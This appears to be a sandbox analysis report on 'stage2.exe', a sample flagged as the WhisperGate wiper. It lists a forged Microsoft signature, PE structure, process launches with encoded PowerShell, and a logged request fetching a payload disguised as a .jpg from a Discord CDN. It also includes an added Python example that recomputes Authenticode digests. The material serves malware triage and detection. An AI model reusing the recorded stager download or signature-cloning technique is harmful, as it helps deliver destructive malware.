                                                      Error Number:-2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST: the embedded signature parses and chains to Microsoft, but the digest it signs does not match this file's content)
                                                      Not Before, Not After
                                                      • 12/15/2020 1:29:14 PM 12/2/2021 1:29:14 PM
                                                      Subject Chain
                                                      • CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                      Version:3
                                                      Thumbprint MD5:1A1395EF5FC0A90A5B83AC4B531EEAC9
                                                      Thumbprint SHA-1:312860D2047EB81F8F58C29FF19ECDB4C634CF6A
                                                      Thumbprint SHA-256:416F4C0A00D1C4108488A04C2519325C5AA13BC80D0C017C45B00B911B8370A9
                                                      Serial:33000002ED2C45E4C145CF48440000000002ED
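Error -2146869232 is HRESULT 0x80096010, TRUST_E_BAD_DIGEST: WinVerifyTrust recomputed the Authenticode digest of the file and it did not equal the digest stored inside the PKCS#7 blob. The Python below is an added example, not code from the report or from the sample, that shows what that digest covers and why a certificate table pasted in from another binary produces exactly this error. It builds a minimal PE32 inline (constructed; the certificate blobs are stand-in bytes, not real PKCS#7 data), then recomputes the Authenticode digest while skipping the three regions the specification excludes: the optional header's CheckSum, the Security data-directory entry, and the certificate table itself. The linear walk is a simplification of the specification's per-section hashing; it is equivalent for files whose sections are contiguous and whose certificate table sits at the end, which is the layout a .NET build produces.

```python
"""Recompute a PE file's Authenticode digest (added example)."""
import hashlib
import struct
from typing import Tuple

IMAGE_DIRECTORY_ENTRY_SECURITY = 4
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def _header_offsets(pe: bytes) -> Tuple[int, int]:
    """Return (file offset of CheckSum, file offset of the Security dir entry)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 24                      # 4-byte signature + 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == PE32_MAGIC:
        data_dirs = opt + 96
    elif magic == PE32PLUS_MAGIC:
        data_dirs = opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    checksum_off = opt + 64                  # same offset for PE32 and PE32+
    return checksum_off, data_dirs + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY


def certificate_table(pe: bytes) -> Tuple[int, int]:
    """(file offset, size) of the WIN_CERTIFICATE blob; (0, 0) if unsigned.
    For the Security entry the 'VirtualAddress' field is a raw file offset."""
    _, entry = _header_offsets(pe)
    return struct.unpack_from("<II", pe, entry)


def authenticode_hash(pe: bytes, algorithm: str = "sha256") -> str:
    """Digest over the file minus CheckSum, Security entry and certificate table."""
    checksum_off, entry = _header_offsets(pe)
    cert_off, cert_size = struct.unpack_from("<II", pe, entry)
    h = hashlib.new(algorithm)
    h.update(pe[:checksum_off])              # headers up to the CheckSum field
    h.update(pe[checksum_off + 4:entry])     # ... skipping the 4-byte CheckSum
    if cert_size == 0:
        h.update(pe[entry + 8:])             # unsigned: everything after the entry
    else:
        h.update(pe[entry + 8:cert_off])     # ... skipping the 8-byte Security entry
        h.update(pe[cert_off + cert_size:])  # ... and the certificate table itself
    return h.hexdigest()


def build_sample_pe(code: bytes, cert_blob: bytes, checksum: int = 0) -> bytes:
    """Constructed minimal PE32: one .text section, then a certificate table.
    cert_blob stands in for PKCS#7 SignedData; it is not a real signature."""
    size_of_headers = 0x200
    code = code.ljust(0x200, b"\0")[:0x200]
    cert_off = size_of_headers + len(code)
    cert_data = cert_blob + b"\0" * (-len(cert_blob) % 8)          # dwLength is 8-aligned
    win_cert = struct.pack("<IHH", 8 + len(cert_data), 0x0200, 0x0002) + cert_data
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                            # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 60, size_of_headers)
    struct.pack_into("<I", opt, 64, checksum)
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                     cert_off, len(win_cert))
    section = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000, len(code),
                          size_of_headers, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + coff + bytes(opt) + section).ljust(size_of_headers, b"\0")
    return headers + code + win_cert


def demo() -> dict:
    # jmp dword ptr [00402000h]: the .NET entry stub shown in the Entrypoint Preview.
    code = b"\xff\x25\x00\x20\x40\x00"
    real = build_sample_pe(code, b"signature-over-original-file")
    cloned = build_sample_pe(code, b"signature-copied-from-another-binary", checksum=0x1234)
    patched = build_sample_pe(b"\x90" + code, b"signature-over-original-file")
    return {
        "file_hash_changes_with_cert": hashlib.sha256(real).digest() != hashlib.sha256(cloned).digest(),
        "authenticode_ignores_cert_and_checksum": authenticode_hash(real) == authenticode_hash(cloned),
        "authenticode_covers_code": authenticode_hash(real) != authenticode_hash(patched),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Two consequences follow for triage. First, the MD5/SHA-256 of a file (what the table above and most AV hash lists key on) change whenever the certificate table is swapped, while the Authenticode digest does not, so a signature block lifted from a genuine Microsoft binary still names Microsoft as signer but fails with TRUST_E_BAD_DIGEST as soon as the verifier recomputes the digest. Second, the certificate's validity window in this report (Not After 12/2/2021) ends before the PE link time stamp (10 Jan 2022), which is an independent indicator that the signature did not originate with this build.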

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                       Data Directories

                                                       Name                                  Virtual Address  Virtual Size  Is in Section
                                                       IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                       IMAGE_DIRECTORY_ENTRY_IMPORT          0x6100           0x4b          .text
                                                       IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8000           0x24118       .rsrc
                                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                       IMAGE_DIRECTORY_ENTRY_SECURITY        0x28800          0xbfa0
                                                       IMAGE_DIRECTORY_ENTRY_BASERELOC       0x2e000          0xc           .reloc
                                                       IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                       IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                       IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                       IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                       Sections

                                                       Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                       .text   0x2000           0x4154        0x4200    False     0.578006628788   data       5.88284633145   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                       .rsrc   0x8000           0x24118       0x24200   False     0.156378406142   data       3.54772483226   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                       .reloc  0x2e000          0xc           0x200     False     0.044921875      data       0.0815394123432 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                       Resources

                                                       Name           RVA      Size     Type                                                                                                                                                         Language  Country
                                                       RT_ICON        0x8250   0x1d4f   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                       RT_ICON        0x9fa0   0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                       RT_ICON        0x1a7c8  0x94a8   data
                                                       RT_ICON        0x23c70  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4043309055, next used block 4294967047
                                                       RT_ICON        0x27e98  0x25a8   data
                                                       RT_ICON        0x2a440  0x10a8   data
                                                       RT_ICON        0x2b4e8  0x468    GLS_BINARY_LSB_FIRST
                                                       RT_GROUP_ICON  0x2b950  0x68     data
                                                       RT_VERSION     0x2b9b8  0x3f4    data
                                                       RT_MANIFEST    0x2bdac  0x36a    XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                       Imports

                                                       DLL          Import
                                                       mscoree.dll  _CorExeMain

                                                       Version Infos

                                                       Description       Data
                                                       Translation       0x0000 0x04b0
                                                       LegalCopyright    . .
                                                       Assembly Version  10.0.18362.1500
                                                       InternalName      Tbopbh.exe
                                                       FileVersion       10.0.18362.1500
                                                       CompanyName       Microsoft Corporation
                                                       LegalTrademarks
                                                       Comments
                                                       ProductName       Microsoft Windows
                                                       ProductVersion    10.0.18362.1500
                                                       FileDescription
                                                       OriginalFilename  Tbopbh.exe

                                                      Network Behavior

                                                      Network Port Distribution

                                                       TCP Packets

                                                       Timestamp                          Source Port  Dest Port  Source IP        Dest IP
                                                       Jan 17, 2022 02:25:23.920696974 CET  49752        443        192.168.2.3      162.159.130.233
                                                       Jan 17, 2022 02:25:23.920753956 CET  443          49752      162.159.130.233  192.168.2.3
                                                       Jan 17, 2022 02:25:23.920846939 CET  49752        443        192.168.2.3      162.159.130.233
                                                       Jan 17, 2022 02:25:23.977926016 CET  49752        443        192.168.2.3      162.159.130.233
                                                       Jan 17, 2022 02:25:23.977962017 CET  443          49752      162.159.130.233  192.168.2.3
                                                       Jan 17, 2022 02:25:24.031980991 CET  443          49752      162.159.130.233  192.168.2.3
                                                       Jan 17, 2022 02:25:24.032147884 CET  49752        443        192.168.2.3      162.159.130.233
                                                       Jan 17, 2022 02:25:24.036612034 CET  49752        443        192.168.2.3      162.159.130.233
                                                       Jan 17, 2022 02:25:24.036638021 CET  443          49752      162.159.130.233  192.168.2.3
                                                       Jan 17, 2022 02:25:24.036952019 CET  443          49752      162.159.130.233  192.168.2.3
                                                       Jan 17, 2022 02:25:24.083822966 CET  49752        443        192.168.2.3      162.159.130.233
                                                       Jan 17, 2022 02:25:24.284538031 CET  49752        443        192.168.2.3      162.159.130.233
                                                       Jan 17, 2022 02:25:24.326009989 CET  443          49752      162.159.130.233  192.168.2.3
                                                       Jan 17, 2022 02:25:24.443249941 CET  443          49752      162.159.130.233  192.168.2.3
                                                       Jan 17, 2022 02:25:24.443366051 CET  443          49752      162.159.130.233  192.168.2.3
                                                       Jan 17, 2022 02:25:24.443631887 CET  49752        443        192.168.2.3      162.159.130.233
                                                       Jan 17, 2022 02:25:24.450921059 CET  49752        443        192.168.2.3      162.159.130.233

                                                       UDP Packets

                                                       Timestamp                          Source Port  Dest Port  Source IP    Dest IP
                                                       Jan 17, 2022 02:25:23.882636070 CET  49572        53         192.168.2.3  8.8.8.8
                                                       Jan 17, 2022 02:25:23.905548096 CET  53           49572      8.8.8.8      192.168.2.3

                                                       DNS Queries

                                                       Timestamp                          Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class
                                                       Jan 17, 2022 02:25:23.882636070 CET  192.168.2.3  8.8.8.8  0xa202    Standard query (0)  cdn.discordapp.com  A (IP address)  IN (0x0001)

                                                       DNS Answers

                                                       Timestamp                          Source IP  Dest IP      Trans ID  Reply Code    Name                CName  Address          Type            Class
                                                       Jan 17, 2022 02:25:23.905548096 CET  8.8.8.8    192.168.2.3  0xa202    No error (0)  cdn.discordapp.com         162.159.130.233  A (IP address)  IN (0x0001)
                                                       Jan 17, 2022 02:25:23.905548096 CET  8.8.8.8    192.168.2.3  0xa202    No error (0)  cdn.discordapp.com         162.159.135.233  A (IP address)  IN (0x0001)
                                                       Jan 17, 2022 02:25:23.905548096 CET  8.8.8.8    192.168.2.3  0xa202    No error (0)  cdn.discordapp.com         162.159.134.233  A (IP address)  IN (0x0001)
                                                       Jan 17, 2022 02:25:23.905548096 CET  8.8.8.8    192.168.2.3  0xa202    No error (0)  cdn.discordapp.com         162.159.129.233  A (IP address)  IN (0x0001)
                                                       Jan 17, 2022 02:25:23.905548096 CET  8.8.8.8    192.168.2.3  0xa202    No error (0)  cdn.discordapp.com         162.159.133.233  A (IP address)  IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • cdn.discordapp.com

                                                       HTTPS Proxied Packets

                                                       Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                       0           192.168.2.3  49752        162.159.130.233  443               C:\Users\user\Desktop\stage2.exe

                                                       Timestamp                kBytes transferred  Direction  Data
                                                       2022-01-17 01:25:24 UTC  0                   OUT        GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1
                                                                                                               Host: cdn.discordapp.com
                                                                                                               Connection: Keep-Alive
                                                       2022-01-17 01:25:24 UTC  0                   IN         HTTP/1.1 403 Forbidden
                                                                                                               Date: Mon, 17 Jan 2022 01:25:24 GMT
                                                                                                               Content-Type: application/xml; charset=UTF-8
                                                                                                               Content-Length: 223
                                                                                                               Connection: close
                                                                                                               CF-Ray: 6cebca1adc534a68-FRA
                                                                                                               Cache-Control: private, max-age=0
                                                                                                               Expires: Mon, 17 Jan 2022 01:25:24 GMT
                                                                                                               Vary: Accept-Encoding
                                                                                                               CF-Cache-Status: MISS
                                                                                                               Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                               Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                               X-GUploader-UploadID: ADPycds5oM3NpZ9AylXZpGVOB9ntKzX9oHiZ36JltKQWVbDwXaSj4icPcReICi5s5vNaRHT4QvI_mIj3uwpfm47zzoOikFzaRA
                                                                                                               X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                               Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RfbSACd0FpP8AarT40rUdyTU16oiVuL8ktNluhrU0TLjW%2BTGsBj6c0zZg%2FW2Tg%2BHLybyYjE0%2BAX8GvswXYherK%2BwZycY1622%2BqIiXLXq84wLdlCovP450WnSVpVht58ekJr99w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                               NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                               Server: cloudflare
                                                       2022-01-17 01:25:24 UTC  1                   IN         Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 41 6e 6f 6e 79 6d 6f 75 73 20 63 61 6c 6c 65 72 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 73 74 6f 72 61 67 65 2e 6f 62 6a 65 63 74 73 2e 67 65 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 47 6f 6f 67 6c 65 20 43 6c 6f 75 64 20 53 74 6f 72 61 67 65 20 6f 62 6a 65 63 74 2e 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                                               Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object.</Details></Error>


                                                      Code Manipulations

                                                      Statistics

                                                      CPU Usage

                                                      Memory Usage

                                                      High Level Behavior Distribution

                                                      Behavior

                                                      System Behavior

                                                      General

                                                       Start time: 02:24:07
                                                       Start date: 17/01/2022
                                                       Path: C:\Users\user\Desktop\stage2.exe
                                                       Wow64 process (32bit): true
                                                       Commandline: "C:\Users\user\Desktop\stage2.exe"
                                                       Imagebase: 0xea0000
                                                       File size: 214944 bytes
                                                       MD5 hash: 14C8482F302B5E81E3FA1B18A509289D
                                                       Has elevated privileges: true
                                                       Has administrator privileges: true
                                                       Programmed in: .Net C# or VB.NET
                                                       Yara matches:
                                                       • Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
                                                       • Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
                                                       • Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
                                                       • Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
                                                       Reputation: low

                                                      General

                                                       Start time: 02:24:08
                                                       Start date: 17/01/2022
                                                       Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                       Wow64 process (32bit): true
                                                       Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
                                                       Imagebase: 0x13a0000
                                                       File size: 430592 bytes
                                                       MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
                                                       Has elevated privileges: true
                                                       Has administrator privileges: true
                                                       Programmed in: .Net C# or VB.NET
                                                       Reputation: high

                                                      General

                                                       Start time: 02:24:08
                                                       Start date: 17/01/2022
                                                       Path: C:\Windows\System32\conhost.exe
                                                       Wow64 process (32bit): false
                                                       Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                       Imagebase: 0x7ff7f20f0000
                                                       File size: 625664 bytes
                                                       MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                       Has elevated privileges: true
                                                       Has administrator privileges: true
                                                       Programmed in: C, C++ or other language
                                                       Reputation: high

                                                      General

                                                       Start time: 02:24:44
                                                       Start date: 17/01/2022
                                                       Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                       Wow64 process (32bit): true
                                                       Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
                                                       Imagebase: 0x13a0000
                                                       File size: 430592 bytes
                                                       MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
                                                       Has elevated privileges: true
                                                       Has administrator privileges: true
                                                       Programmed in: .Net C# or VB.NET
                                                       Reputation: high

                                                      General

                                                       Start time: 02:24:44
                                                       Start date: 17/01/2022
                                                       Path: C:\Windows\System32\conhost.exe
                                                       Wow64 process (32bit): false
                                                       Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                       Imagebase: 0x7ff7f20f0000
                                                       File size: 625664 bytes
                                                       MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                       Has elevated privileges: true
                                                       Has administrator privileges: true
                                                       Programmed in: C, C++ or other language
                                                       Reputation: high

                                                      General

                                                       Start time: 02:25:27
                                                       Start date: 17/01/2022
                                                       Path: C:\Windows\SysWOW64\WerFault.exe
                                                       Wow64 process (32bit): true
                                                       Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
                                                       Imagebase: 0x10a0000
                                                       File size: 434592 bytes
                                                       MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
                                                       Has elevated privileges: true
                                                       Has administrator privileges: true
                                                       Programmed in: .Net C# or VB.NET
                                                       Reputation: high

                                                      Disassembly

                                                      Code Analysis

                                                        Execution Graph

                                                         Execution Coverage: 6%
                                                         Dynamic/Decrypted Code Coverage: 0%
                                                         Signature Coverage: 0%
                                                         Total number of Nodes: 58
                                                         Total number of Limit Nodes: 4

                                                        Graph

                                                         execution_graph 34256 7eaf888 34262 7eaf29c 34256->34262 34258 7eaf8bd 34260 7eaf984 CreateFileW 34261 7eaf9c1 34260->34261 34263 7eaf930 CreateFileW 34262->34263 34265 7eaf8a7 34263->34265 34265->34258 34265->34260 34266 4a61c90 34267 4a61c92 34266->34267 34271 4a64288 34267->34271 34277 4a64278 34267->34277 34268 4a61cd1 34272 4a64292 34271->34272 34273 4a642b7 34272->34273 34283 4a64340 34272->34283 34288 4a643a8 34272->34288 34299 4a64331 34272->34299 34273->34268 34278 4a6427c 34277->34278 34279 4a642b7 34278->34279 34280 4a64340 GetFileAttributesW 34278->34280 34281 4a64331 GetFileAttributesW 34278->34281 34282 4a643a8 GetFileAttributesW 34278->34282 34279->34268 34280->34279 34281->34279 34282->34279 34284 4a64353 34283->34284 34285 4a64371 34284->34285 34286 4a643a8 GetFileAttributesW 34284->34286 34304 4a643b8 34284->34304 34285->34273 34286->34285 34289 4a643ac 34288->34289 34290 4a64363 34289->34290 34293 4a643b6 34289->34293 34295 4a643a8 GetFileAttributesW 34290->34295 34296 4a643b8 GetFileAttributesW 34290->34296 34291 4a644d3 34291->34273 34292 4a64371 34292->34273 34293->34291 34298 4a64948 GetFileAttributesW 34293->34298 34294 4a64492 34294->34291 34297 4a64948 GetFileAttributesW 34294->34297 34295->34292 34296->34292 34297->34291 34298->34294 34300 4a64334 34299->34300 34301 4a64371 34300->34301 34302 4a643a8 GetFileAttributesW 34300->34302 34303 4a643b8 GetFileAttributesW 34300->34303 34301->34273 34302->34301 34303->34301 34306 4a643ba 34304->34306 34305 4a644d3 34305->34285 34306->34305 34310 4a64948 34306->34310 34307 4a64492 34307->34305 34308 4a64948 GetFileAttributesW 34307->34308 34308->34305 34312 4a6494c 34310->34312 34311 4a64978 34311->34307 34312->34311 34314 4a649a6 34312->34314 34318 4a64948 GetFileAttributesW 34312->34318 34319 4a649a8 34312->34319 34313 4a649d5 34313->34307 34314->34313 34324 4a63f9c 34314->34324 34318->34312 34320 4a649ae 34319->34320 34321 4a649d5 34320->34321 34322 4a63f9c GetFileAttributesW 34320->34322 34321->34312 34323 4a64a06 34322->34323 34323->34312 34326 4a64df0 GetFileAttributesW 34324->34326 34327 4a64a06 34326->34327 34327->34307

                                                        Executed Functions

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.348036989.0000000007EA0000.00000040.00000001.sdmp, Offset: 07EA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ea0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 99deacf14a6764af48cd4d771c10455bd929c4c3e3558cf5908f9a12f142a598
                                                        • Instruction ID: 2f0f97a9ee3cc8fa0f55601b9a1b6b63875fc145116200efa35f969f6918aa95
                                                        • Opcode Fuzzy Hash: 99deacf14a6764af48cd4d771c10455bd929c4c3e3558cf5908f9a12f142a598
                                                        • Instruction Fuzzy Hash: 68526BB0601219DFDB25DF64C850BEE73F2EF89308F1085A9D909AB390DB75AD85CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.340699591.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4a60000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e6d29064b122ef45cb379cabdc67a1ad2496caa2541d0abeda9a0112aeb3dbc
                                                        • Instruction ID: 775dd78a9d22f457f185f80f8acce283247538a4fa56cc54df77c898810fe5f9
                                                        • Opcode Fuzzy Hash: 2e6d29064b122ef45cb379cabdc67a1ad2496caa2541d0abeda9a0112aeb3dbc
                                                        • Instruction Fuzzy Hash: 12A16C30600601CFE719DF25C458BAEBBF2BF88318F148569D4569B7A1DB78EC85CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 173 7eaf888-7eaf8bb call 7eaf29c 177 7eaf8bd-7eaf8e5 173->177 178 7eaf8e6-7eaf97c 173->178 187 7eaf97e-7eaf981 178->187 188 7eaf984-7eaf9bf CreateFileW 178->188 187->188 189 7eaf9c8-7eaf9e5 188->189 190 7eaf9c1-7eaf9c7 188->190 190->189
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.348036989.0000000007EA0000.00000040.00000001.sdmp, Offset: 07EA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ea0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: d999962900493bdc2d1a36a8f89c0930861743759f0e0a3de5ec9e8fc72353c7
                                                        • Instruction ID: a796f3b780d0f1933009443d79967816439dcd9a3e7331e8f4e1fea5d96976d2
                                                        • Opcode Fuzzy Hash: d999962900493bdc2d1a36a8f89c0930861743759f0e0a3de5ec9e8fc72353c7
                                                        • Instruction Fuzzy Hash: F641B0B1A00219AFDB10CFA9D845BDEFBF9FB48314F14852AE504AB380D774A840CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (basic blocks and edges recovered from the rendered graph; executed/not-executed colouring is not recoverable in text)

                                                        • 193: 7eaf29c-7eaf97c
                                                        • 196: 7eaf97e-7eaf981
                                                        • 197: 7eaf984-7eaf9bf CreateFileW
                                                        • 198: 7eaf9c8-7eaf9e5
                                                        • 199: 7eaf9c1-7eaf9c7
                                                        • Edges: 193->196, 193->197, 197->198, 197->199, 199->198
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,07EAF8A7,00000000,00000000,00000003,00000000,00000002), ref: 07EAF9B2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.348036989.0000000007EA0000.00000040.00000001.sdmp, Offset: 07EA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ea0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 0e9618b7890e47eb501cd1728c36252308c2c02a070232707424ea774bdd7217
                                                        • Instruction ID: 98a397c4e1d34ce1cf64da2e5da71b58329e6aee30e8a1dc45467c197055ff95
                                                        • Opcode Fuzzy Hash: 0e9618b7890e47eb501cd1728c36252308c2c02a070232707424ea774bdd7217
                                                        • Instruction Fuzzy Hash: E82143B590061AAFCF10CFD9D844ADEFBB8FB08314F00852AE918A7200C774A954CFE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (basic blocks and edges recovered from the rendered graph; executed/not-executed colouring is not recoverable in text)

                                                        • 202: 4a64de8-4a64dea
                                                        • 203: 4a64df2-4a64e3a
                                                        • 204: 4a64dec-4a64df1
                                                        • 207: 4a64e42-4a64e6d GetFileAttributesW
                                                        • 208: 4a64e3c-4a64e3f
                                                        • 209: 4a64e76-4a64e93
                                                        • 210: 4a64e6f-4a64e75
                                                        • Edges: 202->203, 202->204, 203->207, 203->208, 204->203, 207->209, 207->210, 208->207, 210->209
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 04A64E60
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.340699591.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4a60000_powershell.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 4939dd282d51c970d28db45c2b2d00e1ad240f197a2a47444dca8b9adafc4191
                                                        • Instruction ID: 40b6d2f3dc1372d8aea09eddc181b242485be83f83e071376f9c8ab6ce4be5c8
                                                        • Opcode Fuzzy Hash: 4939dd282d51c970d28db45c2b2d00e1ad240f197a2a47444dca8b9adafc4191
